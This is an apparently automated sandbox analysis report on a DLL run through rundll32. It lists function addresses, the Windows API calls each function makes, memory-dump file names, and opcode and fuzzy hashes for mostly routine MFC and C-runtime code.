                                                                                                                      Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3354205298-0
                                                                                                                      • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                      • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                      • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                      • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                      • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                      • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3704204646-0
                                                                                                                      • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                      • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                      • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                      • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetFocus.USER32 ref: 10015607
                                                                                                                      • GetParent.USER32(?), ref: 10015615
                                                                                                                      • SendMessageA.USER32 ref: 10015628
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211600527-0
                                                                                                                      • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                      • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2353593579-0
                                                                                                                      • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                      • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                        • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                      • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 369458955-0
                                                                                                                      • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                      • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                      • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3384502665-0
                                                                                                                      • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                      • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                        • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                      • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                      • __lock.LIBCMT ref: 1003A581
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                      • InterlockedIncrement.KERNEL32(023D1520), ref: 1003A5C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880340415-0
                                                                                                                      • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                      • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,C5005C0B), ref: 1001DCB3
                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,C5005C0B), ref: 1001DCC0
                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,C5005C0B), ref: 1001DCDB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                      • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ActiveEnable$FreeResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 253586258-0
                                                                                                                      • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                      • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                      • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                        • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                        • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 685759847-0
                                                                                                                      • Opcode ID: d44be934c2ef75bd78d99a79b72ea99719dbba6c3db094d6346c85c7022cb1da
                                                                                                                      • Instruction ID: 8d1cfe8ad11ec7d0de67206570733d2bfe4fd9a2d1bcb630a2e9799106cb1609
                                                                                                                      • Opcode Fuzzy Hash: d44be934c2ef75bd78d99a79b72ea99719dbba6c3db094d6346c85c7022cb1da
                                                                                                                      • Instruction Fuzzy Hash: F0E0ED318942B4CBEB04EB20EDC83993BE8FB46305F524526D04693165DF346C99DE62
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 1473721057-3887548279
                                                                                                                      • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                      • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 431132790-2766056989
                                                                                                                      • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                      • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                      • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                        • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                        • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                        • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                        • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                      • String ID: %s.dll
                                                                                                                      • API String ID: 3444012488-3668843792
